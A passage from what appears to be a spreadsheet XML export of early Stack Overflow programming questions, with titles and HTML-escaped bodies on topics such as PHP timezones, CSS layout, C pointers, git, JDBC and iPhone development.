&lt;p&gt;In pseudo code it might look something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;interpolated_string = File.new('myfile.txt').read.interpolate
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But that last &lt;code&gt;interpolate&lt;/code&gt; method doesn't exist.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Default action gets 404 for only one page (asp.net mvc)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I test my app only on local cassini web server, and I get strange thing.&lt;/p&gt;
&lt;p&gt;One Index page works right in default manner, second shows 404, but when use full version Controller/Index - works normal. Only difference I found is that in first sample there is no slash in the end, and in second slash exists, but link that points on corrupted is without slash.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are unit tests and why should I care?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Okay, I develop web applications in PHP and JavaScript and a lot of times here on Stack Overflow I have seen the word &lt;em&gt;unit test&lt;/em&gt; passing by, but nowhere on the website have I been able to found a satisfactory answer to what exactly a unit test is. &lt;/p&gt;
&lt;p&gt;So what are unit tests and should I, as a PHP and JavaScript programmer, care, or are they only for 'real' programming languages?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a "nice" way to deal with reassembling multicasts from multiple sources?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm currently reworking our existing proprietary socket wrapper code to use boost asio so that it can do some of the heavy lifting for us.  Perhaps the most complex area of our existing code is the multicast handling code.   The code allows our middle-tier servers (of which there can me many in one system) to send multicasts to client boxes, which use these to present updates to the users of the system.&lt;/p&gt;
&lt;p&gt;The reason the code is complex and error-prone is that it uses a number of raw buffers to reassemble the multicast streams according to where they have come from.  It appears that even with Boost.Asio I'm going to have to deal with this same issue, so before I get stuck in I thought it would be worth asking how other people have dealt with this situation.&lt;/p&gt;
&lt;p&gt;It seems like a very common use-case. Is there anything out there that can help me do this job without the kind of code I have now?  Or is there an established C++ template (Boost or otherwise) that can do this kind of work?&lt;/p&gt;
&lt;p&gt;Obviously I could make things easier on myself and use STL containers to buffer the packets instead of raw arrays, but this code needs to be really high performance.  On large installs there are a huge number of packets flying around and it needs to respond as near to real time as possible.&lt;/p&gt;
&lt;p&gt;Thanks in advance for any thoughts on this matter.&lt;/p&gt;
&lt;p&gt;Jamie&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best way to generate a Rails app using edge?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Currently when I want to create a Rails application using edge I first just run...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;rails appname
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then I...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;rake rails:freeze:edge
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then I delete all of the folders but the vendor folder which contains the frozen edge. Once that's done I run (from the root of the site)...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ruby vendor/rails/railties/bin/rails .
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I do it this way right now because I want to take advantage of the new rails templates, the new application_controller.rb file name and what not (which I couldn't if I just used the previous generated app and the frozen edge).&lt;/p&gt;
&lt;p&gt;Is there a better way? How does everyone else use edge? Can I install edge as a gem? Is there a convienant way to have just one copy of edge on the computer and use that to generate new apps using just the &lt;code&gt;rails&lt;/code&gt; command?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to work with pointer to pointer to structure in C?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to change member of structure under double pointer. Do you know how?&lt;/p&gt;
&lt;p&gt;Example code&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;typedef struct {
    int member;
} Ttype;
void changeMember(Ttype **foo) {
   //I don`t know how to do it
   //maybe
   *foo-&amp;gt;member = 1;
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How to create a non OwnerDraw Button in .NET?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm creating a plugin to a software that skins the form I created. However, the button are not skin based on them and a standard gray button is shown. Asking on the software forum pointed me that .NET forms control are owner-draw and therefor my button won't redraw with the correct style instead of creating a non ownerdraw button.&lt;/p&gt;
&lt;p&gt;All controls in the system.windows.forms namespace seem to be ownerdraw.&lt;/p&gt;
&lt;p&gt;So how can I create a standar C++ PUSHBUTTON in .NET?&lt;/p&gt;
&lt;p&gt;Currently codding in C# if that helps.&lt;/p&gt;
&lt;p&gt;Thx&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to find "equivalent" texts?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to find (not generate) 2 text strings such that, after removing all non letters and ucasing, one string can be translated to the other by simple substitution.&lt;/p&gt;
&lt;p&gt;The motivation for this comes from a project I known of that is testing methods for attacking cyphers via probability distributions. I'd like to find a large, coherent plain text that, once encrypted with a simple substitution cypher, can be decrypted to something else that is also coherent.&lt;/p&gt;
&lt;p&gt;This ends up as 2 parts, find the longest such strings in a corpus, and get that corpus.&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;The first part seems to me to be amiable to some sort of attack with a B-tree keyed off the string after a substitution that makes the sequence of first occurrences sequential.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;HELLOWORLDTHISISIT
1233454637819a9b98
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;A little optimization based on knowing the maximum value and length of the string based on each depth of the tree and the rest is just coding.&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;The Other part would be quite a bit more involved; how to generate a large corpus of text to search? some kind of internet spider would seem to be the ideal approach as it would have access to the largest amount of text but how to strip it to just the text?&lt;/p&gt;
&lt;p&gt;The question is; Any ideas on how to do this better?&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;Edit: the cipher that was being used is an insanely basic 26 letter substitution cipher.&lt;/p&gt;
&lt;p&gt;p.s. this is more a thought experiment then a probable real project for me.  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Dealing with timezones in PHP</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Some issues with timezones in PHP have been in the back of my mind for a while now, and I was wondering if there are better ways to handle it than what I'm currently doing.&lt;/p&gt;
&lt;p&gt;All of the issues revolve around reformating database stored dates:&lt;/p&gt;
&lt;p&gt;When dealing with a site that has to support multiple timezones (for users), to normalize the timezone offest of stored timestamps I always store it with the server timezone using the &lt;code&gt;CURRENT_TIMESTAMP&lt;/code&gt; attribute or the &lt;code&gt;NOW()&lt;/code&gt; function. &lt;/p&gt;
&lt;p&gt;This way I don't have to consider what timezone was set for PHP when the timestamp was entered (since PHP time functions are timezone aware). For each user, according to his preference I set the timezone somewhere in my bootstrap file using:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;date_default_timezone_set($timezone);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When I'm looking to format dates with the php &lt;code&gt;date()&lt;/code&gt; function, some form of conversion has to take place since MySQL currently stores timestamp in the format &lt;code&gt;Y-m-d H:i:s&lt;/code&gt;. With no regard to timezone, you could simply run:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$date = date($format,strtotime($dbTimestamp));
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The problem with this is that &lt;code&gt;date()&lt;/code&gt; and &lt;code&gt;strtotime()&lt;/code&gt; are both timezone aware functions, meaning that if the PHP timezone is set differently from the server timezone, the timezone offset will apply twice (instead of once as we would like).&lt;/p&gt;
&lt;p&gt;To deal with this, I usually retrieve MySQL timestamps using the &lt;code&gt;UNIX_TIMESTAMP()&lt;/code&gt; function which is not timezone aware, allowing my to apply &lt;code&gt;date()&lt;/code&gt; directly on it - thereby applying the timezone offset only once.&lt;/p&gt;
&lt;p&gt;I don't really like this 'hack' as I can no longer retrieve those columns as I normally would, or use &lt;code&gt;*&lt;/code&gt; to fetch all columns (sometimes it simplifies queries greatly). Also, sometimes it's simply not an option to use &lt;code&gt;UNIX_TIMESTAMP()&lt;/code&gt; (especially when using with open-source packages without much abstraction for query composition).&lt;/p&gt;
&lt;p&gt;Another issue is when storing the timestamp, when usage of &lt;code&gt;CURRENT_TIMESTAMP&lt;/code&gt; or &lt;code&gt;NOW()&lt;/code&gt; is not an option - storing a PHP generated timestamp will store it with the timezone offset which I would like to avoid.&lt;/p&gt;
&lt;p&gt;I'm probably missing something really basic here, but so far I haven't been able to come up with a generic solution to handle those issues so I'm forced to treat them case-by-case. Your thoughts are very welcome&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Django.contrib.flatpages without models</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have some flatpages with empty &lt;code&gt;content&lt;/code&gt; field and their content inside the template (given with &lt;code&gt;template_name&lt;/code&gt; field).&lt;/p&gt;
&lt;h3&gt;Why I am using &lt;code&gt;django.contrib.flatpages&lt;/code&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;It allows me to serve (mostly) static pages with minimal URL configuration.&lt;/li&gt;
&lt;li&gt;I don't have to write views for each of them.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Why I don't need the model &lt;code&gt;FlatPage&lt;/code&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;I leave the content empty and just supply a template path. Therefore I can take advantage of having the source in a file;
&lt;ul&gt;
&lt;li&gt;I can edit the source directly from the file system, without the help of a server (such as admin).&lt;/li&gt;
&lt;li&gt;I can take advantage of syntax highlightning and other editor features.&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;With the model I have to maintain fixtures for flatpages.
&lt;ul&gt;
&lt;li&gt;So the data for the same entity is in two seperate places.&lt;/li&gt;
&lt;li&gt;If I move the content inside the fixture it'll be more difficult to edit.
&lt;ul&gt;
&lt;li&gt;Even if fixture maintenance was a non-issue I'd still need to dump and load these fixtures again and again during development.&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;What I am looking for&lt;/h3&gt;
&lt;p&gt;Basically; getting rid of &lt;code&gt;FlatPage&lt;/code&gt; model while maintaining &lt;code&gt;contrib.flatpages&lt;/code&gt; functionality. I don't have a clear idea how this should be solved. If there's a clean way of modifying (like &lt;code&gt;add_to_class&lt;/code&gt;) &lt;code&gt;FlatPages&lt;/code&gt; to get the information somewhere other than the database I'd prefer that. Maybe the metadata can be inserted to the templates and then a special manager that reads this data would replace the default manager of &lt;code&gt;FlatPages&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;If I don't prefer manual editing over admin functionality for flatpages, how can take the database out of the equation?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Two HTML tables side by side, centered on the page</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have two tables on a page that I want to display side by side, and then center them within the page (actually within another div, but this is the simplest I could come up with):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;style&amp;gt;
  #outer { text-align: center; }
  #inner { text-align: left; margin: 0 auto; }
  .t { float: left; }
  table { border: 1px solid black; }
  #clearit { clear: left; }
&amp;lt;/style&amp;gt;
&amp;lt;div id="outer"&amp;gt;
  &amp;lt;p&amp;gt;Two tables, side by side, centered together within the page.&amp;lt;/p&amp;gt;
  &amp;lt;div id="inner"&amp;gt;
    &amp;lt;div class="t"&amp;gt;
      &amp;lt;table&amp;gt;
        &amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;a&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;b&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;
        &amp;lt;tr&amp;gt;&amp;lt;td&amp;gt;1&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;2&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;
        &amp;lt;tr&amp;gt;&amp;lt;td&amp;gt;4&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;9&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;
        &amp;lt;tr&amp;gt;&amp;lt;td&amp;gt;16&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;25&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;
      &amp;lt;/table&amp;gt;
    &amp;lt;/div&amp;gt;
    &amp;lt;div class="t"&amp;gt;
      &amp;lt;table&amp;gt;
        &amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;a&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;b&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;c&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;
        &amp;lt;tr&amp;gt;&amp;lt;td&amp;gt;1&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;2&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;2&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;
        &amp;lt;tr&amp;gt;&amp;lt;td&amp;gt;3&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;5&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;15&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;
        &amp;lt;tr&amp;gt;&amp;lt;td&amp;gt;8&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;13&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;104&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;
      &amp;lt;/table&amp;gt;
    &amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div id="clearit"&amp;gt;all done.&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I understand that it's something to do with the fact that the tables are floated, but I'm at a loss as to understand what I'm missing. There are many web pages that describe something like the technique I show here, but in any event it doesn't work; the tables cling stubbornly to the left hand margin.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP conditional error</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;i am trying to use an ASP conditional here:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if (Request.Cookies("username")) and
(Request.Cookies("password")) &amp;lt;&amp;gt; ""
Then
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And i keep getting this error:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Type mismatch: '[string: ""]'&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Any ideas what I am getting that?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How should I choose an authentication library for CodeIgniter?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I see there are &lt;a href="http://codeigniter.com/wiki/Category%3aLibraries%3a%3aAuthentication/"&gt;a few&lt;/a&gt;. Which ones are maintained and easy to use? What are their pros and cons? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Questions for python-&gt;scheme conversion</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I currently am trying to write a Python program using scheme semantics so I can later translate it into Scheme without relying on a lot of Pythonic stuff.&lt;/p&gt;
&lt;p&gt;I'm trying solve the sliding puzzle problem (where you have 9 slots and 8 tiles arranged in a square) using a*, depth first, and breadth first search algorithm.  I did this ~11 years ago in some AI class in Lisp, but basically at the time I had no idea about lisp, I hated it with all my heart, and only in retrospect do I realize I was programming "C" in Lisp.  The prof didn't help in this matter.&lt;/p&gt;
&lt;p&gt;I have a python function which can swap two tiles easily:  &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def swap(p, (r1, c1), (r2, c2)):  
    # Swaps *any* two locations and returns new configuration  
    # Does not concern itself with zero location, etc  
    # Not sure how to do this functionally  
    p_p = p[:]  
    temp = p_p[r1][c1]  
    p_p[r1][c1] = p_p[r2][c2]  
    p_p[r2][c2] = temp  
    return p_p  
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'd like to turn this into something you might find in SICP, avoiding side effects, etc.  &lt;/p&gt;
&lt;p&gt;But this brings up a question.  Everything I read in SICP is loops via recursion.  I didn't see anything in accessing arrays/vectors/lists in constant time.  I can imagine a loopish/recursive way to read an element, but I find it harder to imagine a way to create a new list with a certain element changed, without invoking side-effect producing things like set!, and without resorting to crazy if/then/else clauses concerning which element should be changed.  This of course gets more confusing when considering a 2d array.  In this case the solution with python is obvious because of its native support for multidimensional arrays.&lt;/p&gt;
&lt;p&gt;In C/C++/Python/Matlab/Lua/anything else, accessing lists/arrays via the [i] syntax is easy, and directly translates to a hardware-oriented pointer lookup somewhere underneath.  I don't understand how scheme does this, given the atomic operations defined in the SICP version of scheme, which all seem very loop-and-search oriented.  How do the vector and list array access functions work to get constant time access?  (I'm a total newbie here, so I'm not ever sure what functions I'd be talking about).  Is there a C or Assembly library someplace which is secretly being accessed?  Are there any inherent constant-time semantics in scheme which could be used for list/array/vector access, and which would allow me a guilt-free way of using that idiom in Python for the moment?  &lt;/p&gt;
&lt;p&gt;How would can I rewrite the above function in python using Schemish semantics?  How would I rewrite the above function in Scheme?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Should I delete or disable a row in a relational database?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In a brand new program where space isn't really that big a deal, is it better to delete a row or to disable a row by let's say a boolean "Disabled" and have the program just ignore it?&lt;/p&gt;
&lt;p&gt;For example, if I wanted to remove a user from a program.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you execute a Javascript function without 'onclick' like "Grippie" in a new post on SOF</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do you execute a Javascript function without &lt;code&gt;onclick&lt;/code&gt; like "Grippie" in a new post on SOF, like the &lt;code&gt;&amp;lt;div class="grippie" style="margin-right: 59px;"/&lt;/code&gt;&gt; on Stack Overflow when you post a question or answer? I get a nice CSS cursor which lets me know of the movable edge, but how is the JavaScript which resizes the field finding out I clicked on the 'grippie'?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt;
Thank you for the answers which lead to jQuery and describe the handler.
Could I please have a simple use of the handler that determines when the element is clicked, like:  &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;addListener('myElement',performFunction();).onclick;  
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;or however this may work?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Tone Generation in Cocoa Touch</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to generate a tone that I can manipulate frequency and wave. The overall goal is to create a basic piano. Does anyone know how I can achieve this?&lt;/p&gt;
&lt;p&gt;My development platform is the iPhone 2.x&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Visual Studio 2008 C++ Problems</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to write a program to calculate the quadratic formula.  When I run it, I get 2 error messages:&lt;/p&gt;
&lt;pre&gt;error LNK2019: unresolved external symbol _WinMain@16 referenced in function ___tmainCRTStartup
fatal error LNK1120: 1 unresolved externals&lt;/pre&gt;
&lt;p&gt;this is after I changed the last line of code from 
...:&lt;/p&gt;
&lt;pre&gt;&amp;lt;&amp;lt; danswer1, danswer2 &amp;gt;&amp;gt;&lt;/pre&gt;
&lt;p&gt;to &lt;/p&gt;
&lt;pre&gt;&amp;lt;&amp;lt; danswer1 &amp;lt;&amp;lt; "," &amp;lt;&amp;lt; danswer2 &amp;lt;&amp;lt;&lt;/pre&gt;
&lt;p&gt;Before I made that change I got 2 compiler errors: C2563 and C2568.
On a friend's computer the program worked perfectly.&lt;/p&gt;
&lt;p&gt;What can I do to fix this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>"Node cannot be inserted at the specified point in the hierarchy"</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am doing JavaScript Scaffold-like thing. And, code below is showing table. It works normal for all of them, and not for only one table I am getting - in the centring of processing on the third row - I get exception "Node cannot be inserted at the specified point in the hierarchy".&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;   function table_one_view(table) {
        $.getJSON('&amp;lt;%= Url.Action("TableOneView", "Scaffold") %&amp;gt;', { table: table },
                function(out) {
                    var tl = tpl('.table-one-view');
                    ctr().empty().append(tl);
                    $.each(out.columns, function(i, n) {
                        tl.find('thead &amp;gt; tr').append(
                            tpl('.table-one-view-header').html(n.name)
                        );
                    });
                    for (var y = 0; y &amp;lt; out.rows.length; y++) {
                        var tl_row = tpl('.table-one-view-row');
                        for (var x = 0; x &amp;lt; out.rows[y].length; x++) {
                            //error is here
                            tl_row.append(tpl('.table-one-view-cell').html(out.rows[y][x] ? out.rows[y][x] : "&amp;amp;nbsp;"));
                        }
                        tl.find('tbody').append(tl_row);
                    }
                }
          );
    }
    function tpl(query) {
      var t = $('.template ' + query).clone(true).removeClass('in');
      t.find('.in').remove();
      return t; 
    }
    function ctr() { return $('.container.scaffold'); }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Sooner, I could give you link, that you could test and see error in runtime.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Smarty Plugin for Eclipse Europa</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Are there any good Eclipse plugins for creating smarty templates? I am using Europa with PDT on Ubuntu (though I doubt the OS will make a difference for this).&lt;/p&gt;
&lt;p&gt;I found &lt;a href="http://code.google.com/p/smartypdt/" rel="nofollow"&gt;SmartyPDT&lt;/a&gt;, but it did not seem to install properly and some of the discussions on it seemed to suggest it was for an older version of PDT.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Where are all my inodes being used?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I find out which directories are responsible for chewing up all my inodes?&lt;/p&gt;
&lt;p&gt;Ultimately the root directory will be responsible for the largest number of inodes, so I'm not sure exactly what sort of answer I want..&lt;/p&gt;
&lt;p&gt;Basically, I'm running out of available inodes and need to find a unneeded directory to cull.&lt;/p&gt;
&lt;p&gt;Thanks, and sorry for the vague question.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>iPhone TrustStore CA certificates</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does any of you have a clue how to alter the contents of &lt;code&gt;Security.framework/TrustStore.sqlite3&lt;/code&gt;. It seems as if the iPhone uses it to store trusted CA certificates. I really want my iPod touch to trust my custom certificate.  Beside that, does anyone of you know an app (win32) to edit sqlite3 database files (except sqliteman, this one always crashes for me).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a c# library for wrapping multiple SCM provider's APIs?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The project I'm working on requires access to the users source control. To do this we are wrapping the Perforce API and the Subversion API ( using P4.NET and SubversionSharp respectively ). &lt;/p&gt;
&lt;p&gt;We would like to support as many as we can depending on user requirements and I've tried googling for an existing library but no luck. Does a C# library that wraps multiple SCM applications exist?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What do 1.#INF00, -1.#IND00 and -1.#IND mean?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm messing around with some C code using floats and I'm getting 1.#INF00, -1.#IND00 and -1.#IND when I try to print floats in the screen. What does those values mean? I believe that 1.#INF00 means positive infinity, but what about -1.#IND00 and -1.#IND? I also saw sometimes this value: 1.$NaN which is Not a Number but what causes those strange values and how can those help me with debugging?&lt;/p&gt;
&lt;p&gt;I'm using MingW which I believe uses IEEE 754 representation for float points.&lt;/p&gt;
&lt;p&gt;Can someone list all those invalid values and what they mean?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>iPhone and OpenCV</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I know that &lt;a href="http://opencv.willowgarage.com/wiki/Mac_OS_X_OpenCV_Port"&gt;OpenCV was ported to Mac OS X&lt;/a&gt;, however I did not find any info about a port to the iPhone.&lt;/p&gt;
&lt;p&gt;I am not a Mac developer, so that I do not know whether a Mac OS X port is enough for the iPhone.&lt;/p&gt;
&lt;p&gt;Does anyone know better than me?  &lt;/p&gt;
&lt;p&gt;Edit: Thanks for the informed answer Adam. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Ensuring Users are Authenticated in Java Web App</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My web app has a secure area which users log in to via a JSP.  The JSP posts the user name and password to a servlet, which then checks to see if the users credentials are valid.  If they are valid then the user is directed to the secure resource.  How can I ensure that users can't just navigate to the secure resource without validating first?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Reusing a connection while polling a database in JDBC?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Have a use case wherein need to maintain a connection open to a database  open to execute queries periodically. &lt;/p&gt;
&lt;p&gt;Is it advisable to close connection after executing the query and then reopen it after the period interval (10 minutes). I would guess no since opening a connection to database is expensive.&lt;/p&gt;
&lt;p&gt;Is connection pooling the alternative and keep using the connections?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to undo 'git add' before commit?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I mistakenly added files using the command:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;git add myfile.txt
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have not yet run &lt;code&gt;git commit&lt;/code&gt;. Is there a way to undo this, so these files won't be included in the commit?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Essential Firefox Plugins/Extensions?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What firefox plugins could you not live without, as relates to webdev?&lt;/p&gt;
&lt;p&gt;My list would be:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://addons.mozilla.org/en-US/firefox/addon/3227" rel="nofollow"&gt;DBGBar&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://addons.mozilla.org/nl/firefox/addon/6622" rel="nofollow"&gt;Dom Inspector&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Firebug&lt;/li&gt;
&lt;li&gt;&lt;a href="https://addons.mozilla.org/en-US/firefox/addon/6683" rel="nofollow"&gt;Firecookie&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Google toolbar (useful for seo)&lt;/li&gt;
&lt;li&gt;Live HTTP&lt;/li&gt;
&lt;li&gt;&lt;a href="https://addons.mozilla.org/nl/firefox/addon/115" rel="nofollow"&gt;ReloadEvery&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;TamperData&lt;/li&gt;
&lt;li&gt;Web Developer&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I am always on the lookout for new ones though, so I wonder if anyone knows of any great ones that I may have missed?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Fastest javascript page search</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am writing a Firefox extension. I would like to search the current webpage for a set of words, and count how many times each occurs. This activity is only performed when the user asks, but it must still happen reasonably quickly.&lt;/p&gt;
&lt;p&gt;I am currently using indexOf on the BODY tag's innerHTML element, but am finding it too slow to run repeatedly in the following manner:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function wordcount(doc, match)
{
  var count = 0;
  var pos = 0;
  for(;;)
  {
    len=doc.indexOf(match, pos);
    if(len == -1)
    {
      break;
    }
    pos = len + match.length;
    count++;
  }
  return count;
}
var html = content.document.body.innerHTML.toLowerCase()
for(var i=0; i&amp;lt;keywords.length; i++)
{
  var kw = keywords[i];
  myDump(kw + ": " + wordcount(html, kw));
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;With 100 keywords, this takes approximately 10 to 20 seconds to run. There is some scope to reduce the number of keywords, but it will still need to run much quicker.&lt;/p&gt;
&lt;p&gt;Is there a more obvious way to do this? What is the most efficient method? I have some ideas, but am reluctant to code each up without some idea of the performance I can expect:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Navigate the DOM rather than using
innerHTML. Will this be likely
quicker or slower? It would have the
benefit of only searching textual
content.&lt;/li&gt;
&lt;li&gt;Loop through the document word by
word, accumulating a count of each
word's occurence simultaneously.
With this method I would have to do
a bit more work parsing the HTML.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;em&gt;Edit: Turns out that the slowest part was the myDump function writing to the error console. Duh! Nevertheless, there some interesting more efficient alternatives have been presented, which I am intending to use.&lt;/em&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>In C++ is it possible to have a defined purely virtual function?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Here's the deal. I have a big class hierarchy and I have this one method that is extended all the way through. The method always has to look at one or two more variable at each new level and these variable depend on the actual class in the hierarchy. What I want to do is check those two extra variables then call the superclass's version of that same function. I want to be able to define this function as all it's immediate children will use it, but I want to force any children of that class to have to redefine that method (because they will have to look at their new data members)&lt;/p&gt;
&lt;p&gt;So how would I write this? I usually use =0; in the .h file, but I assume I can't use that and define it...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Domain Logic and Data Access of MVC at Remote API/Web Service Layer</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In our system, we have a Remote API layer (e.g. SOAP, XML-RPC, REST, etc.) to handle the domain logic and data access for web application and any client applications that're developed on top of it. Unlike in the past, I do not have business logic code and DB connectivity at the web application, all user actions are translated to be invoking the methods of the layer.&lt;/p&gt;
&lt;p&gt;My concerns are, say for the rendering of a page, it requires making quite a number of calls to grab the data, e.g. a user dashboard with reports, recent history, some portlets, etc. With my current design (of delegating logic and DA to the Remote layer), what're the disadvantages that you are seeing? I see that establishing and transmitting text-based data via HTTP are heavier and more expensive than DB access. Besides, optimization has to be done at the Remote layer instead (given business logic &amp;amp; DA code at the web app, you have more flexibility in optimizing).&lt;/p&gt;
